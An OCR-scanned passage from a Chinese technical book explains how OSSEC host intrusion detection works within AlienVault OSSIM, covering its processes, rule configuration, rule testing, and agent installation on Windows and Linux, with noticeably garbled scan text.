ossec-control 显示 状态 也 可 以 在 Web UI 下 查看 ， 路 径 如 图 9-21 所 示 。 


DETECTION 
[mi 
. MIDS ] WIRELESS Ips 
OVERVIEW | AGENTS |  AGENTLESS | EDITRULES | CONFIG |  HIDSCONTROL 
IMIDSCONTROL ,osoc wenstoc 


Select sensor: [VirtualUSMAllinOne [192.168.11.159]| v] 


> Hide actions 


Clientsyslog is NOT running Agentless is NOT running Debug is enabled HIDS service is UP 


图 9-21 查看 OSSEC 运行 状态 
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由 于 默认 情况 下 OSSEC 没有 配置 Client-syslog、Agentless 以 及 邮件 ， 所 以 这 些 服务 并 没 
有 启动 ， 这 属于 正常 显示 。 


(4) agentd: 把 数据 加 密 转 发 到 服务 器 ， 进 程 名 为 ossec-agentd 。 


9.3.3 OSSEC Server iiij 

OSSEC Server 端 进程 包括 以 下 内 容 : 

(D) remoted: 接收 由 代理 进程 发 送 的 数据 ， 采 用 UDP 协议 ， 通 信 端 口 为 1514， 进 程 名 称 为 
ossec-remoted。 在 排除 日 志 故 障 时 ， 可 启动 ossec-remoted 进程 的 DEBUG 模式 ， 操 作 如 下 : 


#/var/ossec/bin/ossec-remoted -d 
同时 查看 日 志 : 
#tail -f /var/ossec/logs/ossec.log 
(2) analysisd: 数据 处 理 主 模块 ， 进 程 名 称 为 ossec-analysisd， 包 含 以 下 功能 : 


e 日 志 预 解码 (提取 系统 日 志 头 中 主机 名 和 程序 名 以 及 时 间 等 ) ; 

€ 日 志 解 码 (利用 正则 表达 式 提取 敏感 关键 字 ， 比 如 提取 IP、 用 户 名 、ID 等 ; 
e 日 志 分 析 (检测 日 志 解 码 后 的 相关 匹配 规则 ) 。 

(3) monitord: 存活 监控 ， 进 程 名 称 为 ossec-monitord。 


在 OSSIM 的 Web UI 中 ， 我 们 如 何 了 解 HIDS 工作 情况 呢 ? 可 通过 单 击 ENVIRONMENT 
一 DETECTION 菜单 实现 ， 打 开 界 面 如 图 9-22 所 示 。 


al X RA El 
DETECTION ASSETS & GROUPS 
HIDS EVENTS TREND AVAILABILITY HIDS DATA SOURCES. 
— oam 
bc 
Legere cepere egeret 
Ow Va — 276. 2702. 


Activenocai 


图 9-22 OSSEC 主 界面 
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从 上 图 可 以 发 现 AGENT. EDIT RULES, CONFIG, HIDS CONTROL 模块 中 还 有 子 模块 ， 
各 模块 关系 总 结 如 图 9-23 所 示 。 


HIDS 控 制 


AGENTLESS EDIT RULES CONFIG 


' OSSIM 中 配置 Ossec 规 则 ossec.conf 


| | 

| Hos Q9 

| CONTROL 

| 

| 
| O) ts 
| 

| 

L 


编辑 所 选 规 则 | 的 HIDS 日 


DE 
)NFIGURATION ALERTS 


完整 性 检测 


包括 全 局 配置 参数 
、 文 件 /目录 监控 选项 
、 忽 略 监控 的 文件 /目录 


图 9-23 OSSEC 子 模块 菜单 结构 
图 9-23 不 但 为 我 们 提供 了 理解 HIDS 系统 的 一 个 清晰 思路 ， 而 且 反 映 了 信息 : 


€ 从 整体 上 看 ， 与 Ossec Agent 相关 的 配置 在 图 的 左 侧 ， 与 OSSEC Server 相关 的 配置 
EAN., 在 维护 HIDS 时 ， 通 过 点 击 对 应 模块 就 能 准确 找到 对 应 模块 ， 而 不 会 被 众多 
菜单 再 得 没有 头绪 。 比 如 需要 对 Agent 下 的 配置 文件 进行 管理 ， 可 选择 AGENTSN^ 
AGENT.CONF， 在 图 9-23 中 ， 点 线 框 中 的 项 目 AGENT.CONF 中 操作 。 

€ ”如 果 需 要 编辑 OSSEC Server 的 规则 文件 ， 则 在 EDIT RUIES 列表 中 选择 一 个 规则 ， 
然后 再 进行 编辑 。OSSEC 所 有 规则 存放 在 /var/ossec/rules/， 为 了 防止 误 操作 ， 在 该 目 
录 中 还 有 由 backup-rules 开头 的 子 目 录 ， 顾 名 思 义 起 到 还 原 最 初 设置 的 目的 。 

€ 通过 HIDS 控制 台 能 及 时 发 现 停止 的 服务 以 及 日 志 。 


9.3.4 OSSEC 配置 文件 和 规则 库 

多 数 服务 的 配置 文件 在 /etc/， 但 OSSEC 服务 配置 文件 位 于 /var/ossec/etc/ossec.conf 中 。 通 
过 在 Web UI 单 击 Environment 一 Detection 一 HIDS 中 的 CONFIG 选项 , 通过 图 形 界面 就 能 轻松 
实现 OSSEC 规则 的 增 减 ， 如 图 9-24 所 示 。 
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WIRELESS ID 


SVSCHECKS CONFIGURATION 


ENABLED RULES. 


nti 已 启用 规则 列表 
apache_rules.xml 


arpwatch_rules.xml 


owmew | aem 1 ames | remus [conma |i sos conmo 


OSSEC Server E 


C) Drag & Drop the file you want to add/remove or use [+] and [-] links 


图 9-24 管理 OSSEC 规则 


DISABLED RULES. 


未 启用 规则 列表 
asterisk rules.xml 


mmm» 


< 


dimserver_rules.xml 
dam_av_rules.xml 
dovecot_nuilesxml 
drepbear_rules xml 
ms-se rulesoumi 
openbsd rules.xml 
php. rulesaml 
policy_rulesxmi 
roundcube, rules.xml 
trend-osce_rules-xml 
web appsec rues.xml 
wordpress. rules.xml 


ess e|| e| «s e| | e| | E 
-—sg > 


OSSEC 能 通过 分 析 日 志 产 生 报 警 ， 主 要 因为 内 置 大 量 的 OSSEC 规则 ( 约 990 条 )， 规 则 
库 位 于 /var/ossec/rules/*.xml。 若 要 加 载 规 则 文件 ， 需 要 在 /var/ossec/etc/ossec.conf 中 配置 ， 默 


认 的 配置 如 下 : 


上 面 配 置 是 逐条 加 载 规则 ,读者 也 许 会 认为 一 次 加 载 所 有 的 规则 文件 不 是 更 方便 吗 ? 其 实 
不 然 ， 很 多 情况 下 我 们 需要 自 定义 规则 ,而 且 有 些 过 时 的 规则 也 需要 及 时 移 除 。 如 果 一 次 性 将 
所 有 规则 全 部 加 载 ， 则 无 法 满足 我 们 的 需求 ， 故 笔者 推荐 大 家 使 用 逐条 添加 的 策略 。 
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9.3.5 ”测试 规则 
当 自 己 定制 规则 或 修改 已 有 的 OSSEC 规则 时 , 都 需要 进行 反复 测试 ,第 2 章 讲 过 regexp.py 
工具 的 使 用 ， 我 们 先 利 用 regexp.py 对 ossec-single-line.cfg 插件 进行 验证 ， 如 图 9-25 所 示 。 


localhost: /usr/share/ossim/scripts/regexp.py /var/ossec/logs/alerts/alerts.log /etc/ossim/agent/ 
lugins/ossec-single-line.cfg v 

Multiple regexp mode used, parsing /etc/ossim/agent/plugins/ossec-single-line.cfg 

Matched using 0025 — syslog errors 

AV - Alert - "1444536011" --> RID: "1002"; RL ; RG: "syslog,errors,"; RC: "Unknown problem some 
where in the system."; USER: "None"; SRCIP: "None"; HOSTNAME: "localhost"; LOCATION: "/var/log/sysl 
og"; EVENT: "[INIT]Oct 11 00:00:10 localhost nfcapd[2620]: Ident: 'EBFCC3E41C8942CBABABBGDBOAQS52F1 
' Flows: 3, Packets: 13, Bytes: 6208, Sequence Errors: 0, Bad Packets: 2[END]"; 


9-25 WA ossec 插件 


除 此 之 外 OSSEC 系统 还 提供 了 ossec-logtest 工具 ， 它 通过 日 志 告 诉 用 户 将 如 何 解码 ， 以 
及 哪些 信息 被 提取 和 触发 了 哪 一 条 规则 。 比 如 ， 我 们 需要 监控 Apache 服务 的 访问 日 志 ， 将 它 
添加 到 OSSEC 日 志 源 ， 修 改 Agent 端的 ossec.conf 配 置 文件 ， 加 入 如 下 配置 : 

<localfile> 

Xlocation»/var/log/apache2/access.log«/location» 


Xlog format»apachec/log format» 
«/1localfile» 


标签 <location> 的 内 容 为 需要 监控 服务 的 访问 日 志 。 接 下 来 ， 在 命令 行 接着 使 用 
/varossec/bin/ossec-logtest 命令 ， 通 过 返回 值 判断 修改 或 新 添加 的 规则 是 否 匹 配 成 功 ， 待 成 功 
之 后 再 重启 OSSEC Server 和 Agent 端的 服务 ， 这 样 更 加 稳妥 。 

对 日 志 进 行 分 析 ， 通 过 如 图 9-26 所 示 的 命令 完成 。 


VirtualUSMAlllInO0ne:^& cat /var/log/auth.log |/var/ossec/bin/ossec-logtest -a 
2015/10/04 00:08:33 ossec-testrule: INFO: Reading local decoder file. 
2015/10/04 00:08:33 ossec-testrule: INFO: Started (pid: 2532). 

** Alert 1443931713.1: mail - syslog,attacks,invalid login, 

2015 Oct 04 00:08:33 VirtualUSMAlllnOne-»stdin 

Rule: 40101 (level 12) -> 'System user successfully logged to the system." 
User: daemon 

Oct 4 00:01:30 VirtualUSMAllInOne su[1999]: + ??? root:daemon 


9-26 ossec-logtest 测试 结果 
理解 这 行 命令 后 ， 我 们 稍 加 扩展 成 为 如 下 命令 : 
#cat /var/ossec/logs/alerts/alerts.log | /var/ossic/bin/ossec-logtest -a 
其 他 测试 命令 还 包括 : 


#/var/ossec/bin/ossec-logtest -t /* 测 试 配 置 */ 
#/var/ossec/bin/ossec-logtest -d  /* 运 行 调试 模式 */ 
#/var/ossec/bin/ossec-logtest -h /* 显 示 帮 助 信息 */ 


9.3.6 ”分 布 式 系 统 中 OSSEC Agent 的 管理 
OSSIM 能 够 非常 方便 地 实现 分 布 式 部 署 ， 相 关内 容 在 第 2 章 就 已 经 详细 讲解 ， 这 里 为 大 
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家 介绍 分 布 式 环境 下 ，OSSEC Agent 管理 需要 注意 的 内 容 。 

OSSIM 中 以 各 个 网 段 的 Sensor 为 单位 来 管理 监控 网 段 内 的 所 有 Agent， 所 以 在 分 布 式 
OSSIM 环境 中 ， 安 装 、 使 用 Agent 时 ， 需 要 格外 注意 Sensor 所 监管 的 各 个 Agent。 一 个 简单 
的 分 布 式 环境 ， 图 9-27 所 示 。 


OSSIM USM 


图 9-27 分 布 式 OSSEC 系统 Agent 配置 数据 流向 


在 上 图 中 Sensor-1， 这 人 台 主 机 内 本 身 装 有 Ossec Agent， 同 时 还 统一 管理 监控 网 段 内 的 所 
有 Windows. Linux 的 Ossec Agent 的 配置 文件 。 举 个 例子 ， 大 家 在 为 VLAN-1 中 的 一 台 主 机 
安装 Agent， 首 先 要 选择 负责 监控 VLAN-1 的 Sensor-1， 如 图 9-28 所 示 。 这 里 假设 Sensor 
(192.168.11.188) 选择 之 后 ， 系 统 会 列 出 当前 所 有 Agent， 这 时 再 单 击 添加 Agent 按钮 ， 才 是 
正确 的 安装 方法 。 


Select sensor: [VirtualUSMAllinOne [192.168.11.150] v] 
sensor [192.168.11.188] 
sensor2 [192.168.11.90] 

— — alienvault [192.168.11.129] 


ID a AGENT NAME € ASSET € IP/dDDR $ 


Q ox Keren E VirualUSMAllInOne 127001 


图 9-28 多 Sensor 环境 添加 Agent 


9.3.7 OSSEC 日 志 存 储 


首先 确保 磁盘 分 区 有 足够 剩余 空间 , OSSEC 把 日 志 存 储 在 /var/ossec/logs/alerts 目录 , 在 基 
于 日 志 事 件 生成 的 年 份 和 月 份 的 目录 中 保存 日 志 。 例如 /var/ossec/logs/alerts/ 年 /月 / ossec. alerts - 
日 期 .log， 如 图 9-29 所 示 。 
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DETECTION 


HIDS WIRELESS IDS 
OVERVIEW | AGENTS |  AGENTLESS |  EDITRULES | CONFIG | OSSEC CONTROL 
ALERTS LOG 


ALERTS LOG View [50 — 


929 日 志 输 出 


与 OSSIM 中 的 RAW LOG 日 志 一 样 ,OSSEC 日 志 也 是 文本 格式 , 这 意味 着 可 以 直接 查看 ， 
支持 Perl 脚本 检索 。 在 关联 分 析 之 后 ，OSSIM 把 重要 的 OSSEC 报警 按照 一 定格 式 转 储 到 
MySQL 数据 库 (alienvault) 中 以 便 今后 分 析 ， 这 才 是 最 重要 的 数据 。 另 外 ， 我们 可 以 在 SIEM 
控制 台中 ， 通 过 数据 源 筛 选 快速 查看 HIDS 事件 ， 细 节 下 面 再 介绍 。 


9.3.8 OSSEC Agent 安装 

我 们 知道 OSSEC 属于 C/S 架构 , 由 于 OSSEC Server 安装 在 OSSIM 系统 中 并 已 配置 , 我 
们 通过 OSSEC Servert+Agent 方 式 实现 HIDS 功能 。 我 们 先 在 Windows 系统 上 安装 Agent， 然 
后 在 Linux 平台 安装 。 

目前 在 OSSIM 4.8 的 Web UI 中 安装 OSSEC Agent 更 为 方便 , 因为 系统 会 把 和 用 户 交 互 过 
程 中 的 配置 信息 自动 写 入 配置 文件 。 下 面 分 为 单独 Agent 安装 和 自动 化 安装 Agent 两 种 方式 来 
介绍 。 

1. Windows 系统 上 安装 Agent 

(1) 单独 Agent 安装 

接 下 来 以 Windows 7 系统 为 例 来 添加 OSSEC Agent。 为 了 调试 方便 ， 调 试 程序 暂时 关闭 
Windows 7 系统 防火 墙 ,该 实验 选用 OSSIM 4.8 版 本 ,此 处 Agent 所 在 系统 的 卫 为 192.168.11.2， 
OSSIM Server IP=10.32.11.150。 

进入 Web UI 界面 ， 依 次 选择 ENVIRONMENT 一 DETECTION 一 HIDS 一 AGENTS， 如 图 
9-30 所 示 。 然 后 选 位 于 屏幕 左下 方 的 “ADD AGENT” 按 钮 。 
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DETECTION 

HIDS WIRELESS os 

OVERVIEW | AGENTS | AGENTLESS | EDITRULES | CONFIG | OSSEC CONTROL 
AGENT CONTROL  SYSCHECK AGENT.CONF 


AGENT INFORMATION 


w < name $ Paor $ CURRENTP $ CURRINTUSERGDOMAN $ STATUS e AcnoNs 


O w aimant (sever) 12021 5 : Aetirel oral 61. FO 时 中间 


SHOWING 


f, ADD AGENT 


图 9-30 ”添加 代理 
接着 输入 客户 机 名 (比如 可 以 是 这 台 机 器 的 NETBIOS 44 “Win7” IP 地 址 192.168.11.2, 
在 OSSIM 4.8 系统 中 添加 Agent 界面 ， 如 图 9-31 Ca) 所 示 ， 而 在 OSSIM 5.0 之 后 的 版 本 中 添 


加 Agent， 不 用 手工 输入 IP 和 机 器 名 称 ， 而 直接 在 资源 池 中 选取 ， 更 加 方便 用 户 ， 操 作 界 面 
如 图 9-31(b) 所 示 。 


NEW HIDS AGENT 


Values marked with (*) are mandatory 


Select an asset to connect to HIDS agent. This will associate the agent with the asset 
SO that you can see the status of the agent from the asset views. * 


[Host-192-168-11-37 (192.168.11.37) 


S o All Assets 


Agent Name * 


Host 192-168-1137 


NEW AGENT IP/CIDR* ] This is a dynamic IP address (DHCP) 
192.168.1137. 


AGENT NAME * b 


w/cIDR + [62:16:12 x [~e] 


(a) 


图 9-31 设置 代理 名 称 和 下 


在 进行 Agent 各 种 操作 时 有 9 个 按钮 每 一 个 功能 都 需要 大 家 掌握 , 其 含义 如 图 9-32 所 示 ， 
为 了 下 载 预 配置 Agent 代理 程序 , 我 们 先 单 击 第 7 个 按钮 ， 即 可 开始 下 载 (大 小 约 为 792KB )， 
完成 后 双击 安装 即 可 。 注 意 : 此 处 下 载 的 程序 中 包含 了 配置 文件 和 Key， 专 门 为 所 选 定 的 客户 
机 定制 , 复制 到 其 他 机 器 无 法 使 用 , 这 个 和 在 http://www.ossec.net/ 网 站 上 下 载 的 通用 代理 程序 
不 同 。 
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修改 过 的 注册 表 项 


生成 Agent Key 
Extract Key / Modified registry entries 
Re N : Sn jJ Rootcheck 
完整 性 与 rootkit 检 查 N 查询 修改 过 的 文件 / / — Windows 预 配置 Agent 下 载 
Integrty;rootkit checking \ \ 5 PENT 
\ N Modifed Files JN | Windows 下 自动 部 署 Agent 
N N 
: : N juu, 
重启 代理 P MI | sm 
Restart Agent Jeep i f 
7j j ! / I 
/ / | / 
Y 6 y yy 
i ge OR 


图 9-32 Agent 操作 按钮 含义 对 照 


Agent 软件 的 安装 路 径 为 C:\Program Files(x86)\ossec-agent\。 依次 选择 Windows 系统 的 开 
始 菜单 一 ossec 一 Manage Agent 程序 (程序 名 称 为 win32ui.exe)， 因 为 是 安装 的 预 配置 程序 ,所 
以 这 时 会 发 现 OSSEC Server IP 地 址 和 认证 密 钥 都 可 自动 填写 完毕 , 如 图 9-33 所 示 。 还 可 以 在 
Web UI 中 ， 单 击 如 图 9-32 所 示 的 第 3 个 按钮 ， 查 看 生成 的 密 钥 。 
y OSSEC Agent Manager IX 


Manage View Help 
Dssec HIDS v28 
Agent: localhost (2) - 192.168.11.2 
Status: Running 


OSSEC Server IP: 
Authentication key: [MiBsb2NhbGhvc30gMT kyLjE 2t 


| Save Refresh 


spywwwossecnet Installed on Oct 04 2015 at 21:4 


图 9-33 ”在 代理 程序 中 查看 OSSEC 服务 器 IP 地 址 及 客户 端 密 钥 
如 使 用 旧版 本 COSSIM 4.3+OSSEC 2.7)， 则 需要 手动 将 Web UI 生成 的 密 钥 复制 至 客户 
端的 验证 密 钥 框 中 并 保存 ， 最 后 启动 代理 程序 。 


Sensor 仅 用 来 管理 它 所 监控 网 段 内 的 主机 ， 不 能 跨越 路 由 ， 而 Sensor 和 OSSIM Server 之 
间 的 通信 却 可 以 跨越 多 个 路 由 ，Sensor、OSSIM Server 可 以 在 同一 个 IDC 机 房 ， 也 可 分 


别 在 异地 机 房 。 在 实践 中 有 些 读者 会 出 现下 面 示例 中 的 错误 。 


在 母 机 安装 有 Windows 系统 CIP 地 址 为 : 10.32.x.y)， 安 装 Vmware， 在 其 中 安装 了 两 台 
虚拟 机 分 别 是 192.168.91.228 (安装 OSSIM USM) 和 192.168.91.140 (安装 Windows 7 系统 )。 
能 够 看 出 Sensor 和 192.168.91.140 都 在 一 个 网 段 ， 而 母 机 和 Sensor 之 间 ， 不 在 同一 网 段 。 此 
时 在 OSSIM Web UI 中 部 署 HIDS， 就 会 出 现 同一 个 网 段 内 的 客户 机 都 能 安装 HIDS， 而 不 在 


一 个 网 段 的 无 法 自动 安装 ， 如 果 手 动 安装 却 无 法 正常 通信 ， 如 图 9-34 所 示 。 
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Hios — wneessips 访问 0SSIM 的 WebUI 

OVERVIEW | AGENTS | AGENTLESS | EDTRULES | CONFIG |  HIDSCONTROL 

AGENT CONTROL 
pooch AGENT INFORMATION ADD AGENT 

AN 
D — 4 AGENT NAME 2 asser 2 IaoR $ CURRENTIP CURRENT USER sas s ACTIONS 
5 Y 
UT OSSIM, IP:192. 168. 91. 228 
Q mm UE. ena to01 oo ă o- Amvenocal @ Be mem 
Q9 oo Host-192-158-91-144 Host-102.16891-144 19218891144 Deed © ORA oa emu 
Mes 

o: Fco - HoscIS2- 8912 OE H, A Windows Dscomnened 9G. Bcc) U 
9: Host-192-154-91-140 Host-192-168-91-140 19215891140 19216891140 - e 2591.B85C0B6 


走 报 机 安装 在 Windows 
图 9-34 无 法 下 载 Agent 实例 


(2) 检查 安装 情况 
客户 机 浏览 器 中 打开 OSSIM 管理 界面 ,在 Analysis 一 Detection 一 HIDS 中 ,可 以 查看 到 代 
理 已 成 功 添加 ， 状 态 为 Active， 如 图 9-35 所 示 。 将 鼠标 移动 到 ID 号 前 面 “!” 号 位 置 ， 便 能 
查看 当前 Agent 的 工作 状态 。 


OVERVIEW | AGENTS | AGENTES | EDTRULES | CONFIG | HoscoNTROL 


MIOS EVENTS TREND. HIDS DATA SOURCES. 


J 跳 转 到 SIEM |. 
控制 台 查 看 
详细 事件 


26A An BA Ag Wag MAA 1Sen 


AGENT INFORMATION 


Z PIDR $ CURRENTIP CURRENT USER saws 7». TREND MMEUTE 
327001 127001 Actve/local 
mss 7a aave 
o Win2012 Win2012 TPR re Active 
ERU LI 站 
0: Win2003 < Win2003 oooom 17000. aawe 


HOWING 1 TO 4 OF 4 AGENTS 


Si Ossec Agent 所 在 主机 状态 | 


图 9-35 HIDS 中 Agent 的 工作 状况 


图 中 显示 了 所 有 活动 代理 的 情况 , 在 右 侧 “HIDS DATA SOURCES ”区 域 的 扇形 显示 图 像 
中 ， 当 鼠标 移动 到 扇形 区 域 上 ， 会 立刻 显示 出 当前 OSSEC 日 志 名 称 及 所 占 比 例 ， 单 击 该 区 域 
会 调 出 SIEM 中 显示 OSSEC 的 事件 。 另 外 在 命令 行 下 操作 时 还 可 以 知道 更 详细 的 信息 ， 我 们 
在 命令 行 中 输入 以 下 命令 : 


* /var/ossec/bin/agent control -lc 
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由 上 图 的 显示 结果 可 以 判断 ，OSSIM 代理 (Agent) 程序 扮演 着 检测 引擎 的 角色 ， 它 根据 
主机 行为 特征 库 对 受 检测 主机 上 的 可 疑 行为 进行 采集 、 分 析 和 判断 ， 并 把 警报 信息 发 送 给 控制 
端 程序 ， 特 征 库 包括 很 多 类 操作 系统 上 的 事件 。 这些 事 件 检查 可 疑 的 文件 传输 ， 以 及 被 拒绝 的 
登录 企图 特征 库 也 可 包括 来 自 许 多 应 用 程序 和 服务 如 Secure Shell Sendmail Bind 和 Apache 
服务 等 .HIDS 可 以 根据 结果 来 进行 判断 , 比如 关键 系统 文件 有 无 在 未 经 允许 的 情况 下 被 修改 ， 
包括 访问 时 间 、 文 件 大 小 和 MDS 密码 校 验 值 。 

(3) 接收 Windows 事件 

当代 理 装 好 之 后 ， 接 下 来 就 要 查看 从 Agent 端 发 送 到 Ossec Server 端的 Windows 事件 ， 
OSSIM 的 Web UI 中 提供 非常 友好 的 界面 ， 获 取 这 些 信息 还 是 在 SIEM 控制 台中 进行 。 在 图 
9-36 展示 出 代理 所 在 客户 机 192.168.11.2 这 台 Windows 机 器 上 发 出 的 一 条 审计 失败 的 事件 。 


SECURITY EVENTS (SIEM) o 
SIEM | REAL-TIME 
Security Events — AllenVault HIDS: Windows audit failure event. NEXT 
AlienVault HIDS: Windows audit failure event. EE 
DATE CATECORY System 
ALIENVAULT SENSOR SUB-CATEGORY Information 
DEVICE IP DATA SOURCE NAME Vault HIDS-windows 
EVENT TYPE ID. DATA SOURCE ID 7006 
UNIQUE EVENT ID i i PRODUCT TYPE Operating System 
PROTOCOL TCR ADDITIONAL INFO. 


9.36 Windows 审计 失败 事件 
这 条 审计 失败 的 原始 日 志 ， 由 图 9-37 所 示 。 


USERNAME USERDATAT USERDATAZ USERDATA3 USERDATA4 USERDATAS 


(no user) localhost windows 


localhost] 192.16! Windows audit failure eve 
>W nt 


RAW LOG 


图 9-37 Windows 审计 失败 事件 的 原始 日 志 


注 : RID 表示 规则 IO，RL 表示 规则 级 别 ，RG 表示 规则 组 。 
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(4) Agent 快速 安装 


为 方便 安装 Agent， 系 统 可 以 无 须 到 客户 机 上 手动 安装 Agent， 直 接 在 Web UI 上 完成 安 


装 ， 快 速 部 署 OSSEC Agent 条 件 有 些 苛刻 : 


© 目标 计算 机 为 Windows 2000 Pro 及 以 上 系统 启用 Microsoft 网 络 客户 端 和 Microsoft 


网 络 的 文件 和 打印 共享 服务 。 
e ”调试 期 间 关闭 防火 墙 。 


€ 用 户 有 administrator 权限 在 目标 计算 机 系统 安装 软件 。 
© 对 于 非 Windows 域 成 员 的 用 户 ， 需 要 关闭 UAC (User Account Control ) 


下 面 看 个 操作 实例 在 Web UI 的 Environment 一 Detection 一 HIDS 一 Agents 一 Agent Control 


中 ， 首 先 单 击 “Add Agent” 按 钮 ， 输 入 客户 机 的 操作 系统 名 称 和 IP 地 址 。 接 着 单 击 第 8 个 按 


钮 快速 部 署 Agent 按钮 〈 仅 针对 Windows 系统 )， 如 图 9-38 所 示 。 


AGENTINFORMATION 


0 w SNwnore 127001 m 
Ow wmo srsenis 1921681123 ace 
0: weak miann gnis pee 


a Toi SEU FCR 点 击 自动 化 部 署 技 钥 
图 9-38 批量 部 署 
接着 输入 用 户 名 和 登录 密码 ， 如 图 9-39 所 示 。 


AUTOMATIC DEPLOYMENT FOR WINDOWS 


eot 
NEOL [ 


© Deployment completed successfully 


Values marked with (") are mandatory 


OSSEC SERVER IP 


AGENT 
DOMAIN alienvault. 
USER * administrator 

PASSWORD*  eccecsee 


9-39 填写 验证 信息 


填写 完毕 之 后 单 击 “Update” 按 钮 安装 ， 即 可 后 台 完 成 ， 本 次 实验 中 Windows 系统 所 在 


Domain 为 alienvault。 
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在 首次 进入 OSSIM Web UI 界面 打开 设置 向 导 中 , 系统 会 逐步 引导 用 户 进行 HIDS 的 批量 
| 部 署 ， 但 对 于 实际 企业 中 各 种 复杂 的 Windows 系统 而 言 ， 不 建议 盲目 采用 自动 化 部 署 ， 
| 那样 你 可 能 会 被 各 种 奇怪 的 问题 所 阻碍 ， 所 以 手动 安装 或 许 是 更 加 稳妥 的 方法 。 


2. Linux 下 安装 配置 Agent 

安装 AlienVault HIDS Linux 客户 端 比 Windows 系统 更 复杂 ， 且 不 能 批量 远程 部 署 ， 需 要 
从 源码 编译 安装 ， 在 实际 环境 中 建议 大 家 手动 安装 ， 一 方面 可 以 深入 理解 C/S 工作 模式 ， 另 
一 方面 排查 故障 更 及 时 。 


(1) 准备 工作 
安装 前 系统 需要 C 编译 环境 和 基本 内 核 ， 包 括 libe 库 ， 下 面 进行 如 下 准备 工作 。 


基于 Debian 系统 ， 例 如 Ubuntu: 
#apt-get install build-essential 


基于 Redhat 系统 ， 例 如 CentOS: 
#yum groupinstall "Development Tools" -y && 
#yum install kernel-devel -y 
(2) 安装 实例 
下 面 在 Debian Linux 主机 (192.168.91.144) 上 安装 Agent, OSSIM (192.168.91.228): 


#cd /usr/src 
#wget http://www.ossec.net/files/ossec-hids-2.8.2.tar.gz /* 下 载 */ 


#tar -zxvf ossec-hids-2.8.2.tar.gz /* 解压 缩 包 */ 
#cd ./ossec-hids-2.8.2 
#/install.sh /* 安装 ， 默 认 目 录 为 /var/ossec */ 


Ossec-hids 软件 安装 过 程 中 分 为 以 下 步骤 : 


选择 安装 语言 ， 输 入 en。 

选择 安装 类 型 ， 输 入 agent. 

选择 安装 目录 ， 默 认 /var/ossec: 回 车 。 

输入 OSSEC Server 的 IP 地址: 192.168.91.228 。 

是 否 希 望 运行 完整 性 检测 ， 默 认 [y]: 回 车 。 

是 否 希望 运行 rootkit 检测 ， 默 认 [y]: 回 车 。 

是 否 启用 联动 (active respone) ， 默 认 [y]: 回 车 。 

接 下 来 开始 正式 编译 安装 ， 配 置 完成 后 出 现 以 下 提示 : 
开始 0SSEC HIDS: /var/ossec/bin/ossec-control start 


停止 OSSEC HIDS: /var/ossec/bin/ossec-control stop 
配置 文件 修改 地 址 为 /var/ossec/etc/ossec.conf 
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此 时 ossec-logcollector 进程 会 监控 下 列 日 志文 件 : 


程序 安装 完毕 ， 接 着 要 配置 Agent， 包 括 生 成 key， 导 入 key 启动 Agent 等 过 程 。 


(3) 产生 Agent Key 
在 Environment 一 Detection 中 ， 选 择 Agents， 还 是 单 击 右 侧 的 “Add Agent” 按 钮 ， 输 入 
代理 名 称 和 Agent 安装 的 主机 IP 〈192.168.91.144)， 接 着 单 击 钥 是 图标， 产生 Key: 


(4) 导入 Agent Key 
在 Web UI 中 生成 Agent Key 之 后 ， 再 返回 到 192.168.91.144 控制 台 。 并 执行 以 下 代理 管 
程序 : 


n 


选择 “(I)mport key from the server(I)" « 58A Cz B] L. 命令 行 出 现 “Paste it here(or `\q` 
to quit)” 提 示 后 ， 便 可 把 Key 粘贴 进去 ， 之 后 显示 : 


系统 提示 确认 添加 代理 ? 选择 “y”， 下 面 就 要 启动 Agent。 
(5) 启动 Agent 


(6) 查看 Agent 日 志 
在 OSSEC Agent 端 (192.168.91.144) 查看 Agent 日 志 。 


TE OSSEC Server 端 (192.168.91.288) 查看 收集 到 的 Agent 日 志 。 


虽然 Agent 发 送 来 的 日 志 队列 存储 位 于 /varossec/queue/， 包 括 syscheck、rootcheck 等 组 件 
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的 队列 ， 它 们 最 终 记录 在 alerts.log 文件 。 查 看 所 有 Agent 活动 状态 ， 输 入 以 下 两 个 命令 : 


#/var/ossec/bin/agent control -lc 

OSSEC HIDS rootcheck control. List of available agents: 

ID: 000, Name: alienvault (server), IP: 127.0.0.1, Active/Local 
ID: 001, Name: Host-192-168-91-144, IP: 192.168.91.144, Active 


仅 列 出 活动 代理 : 


#/var/ossec/bin/list agents -a 


(7) 查看 Linux 系统 的 Agent 
刚刚 在 Linux 客户 端 上 安装 的 Ossec Agent 工作 状态 , 在 Web UI 查看 效果 如 图 9-40 所 示 。 


AGENT CONTROL 


AGENT INFORMATION 
© PDR © CURRENTIP CURRENTUSER saus 6 ACTIONS 
zoo i001 savenal 9B O8 
79216691144 — 192.16851.144 Adive SORD Boe T 


图 9-40 查看 Linux 下 的 Ossec Agent 工作 状态 


(80 检验 效果 
下 面 通过 在 客户 机 上 修改 一 个 文件 来 检验 报警 功能 。 如 果 我 们 在 客户 端 192.168.91.144 上 
更 改 ossec.conf 配置 文件 : 


#vi /var/ossec/etc/ossec.conf 
在 该 文件 中 添加 一 行内 容 ， 保 存 退 出 ，ossec.conf 文件 大 小 发 生变 化 ， 该 文件 的 mds 也 会 


发 生变 化 ， 我 们 立即 可 以 查看 Ossec 报警 。 在 SIEM 控制 台 下 ， 可 以 看 到 如 图 9-41 所 示 的 事 
件 报告 ， 以 及 图 9-42 所 示 的 原始 日 志 内 容 。 


Security Events — AlienVault HIDS: Integrity checksum changed NEXT 
AlienVault HIDS: Integrity checksum changed. EM 

DATE 2015-10-08 18:17:33 CMT 8:00 CATEGORY Alert 

ALIENVAULT SENSOR alienvault [192.168.91.228] SUB-CATECORY HostlDS Alert 

DEVICE IP 192.168.91.144 [ethO] DATA SOURCE NAME AlienVault HIDS-syscheck 

EVENT TYPE ID. 550 DATA SOURCE ID 7094 

UNIQUE EVENT ID# Hee C AE HER PRODUCT TYPE Intrusion Detection 

PROTOCOL TP ADDITIONAL INFO 


图 9-41 HIDS 发 现 文件 被 修改 的 安全 事件 
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FILENAME USERNAME USERDATA2 USERDATA3 USERDATA4 USERDATAS 
New shalsum- 8723cd50a9 Old shalsum: calcd214985 
New mdSsum: bbf668371fb Old md5sum- 34f6585189c New: ea B H 
jvarjossec/etc/ossec.conf None TAJGfbelal2I981222/2  za9ci4bljuse/SGbSOeap $15/90290282982ac2549d 9f6792883009109caed144 
e770 969afaf 
USERDATAG USERDATA7 
Old size: 3127 New size: 3189 


RAW LOG 


图 9-42 HIDS 发 出 的 原始 报警 日 志 


接着 下 来 , 我们 把 以 上 在 ossec.conf 配置 中 修 - 
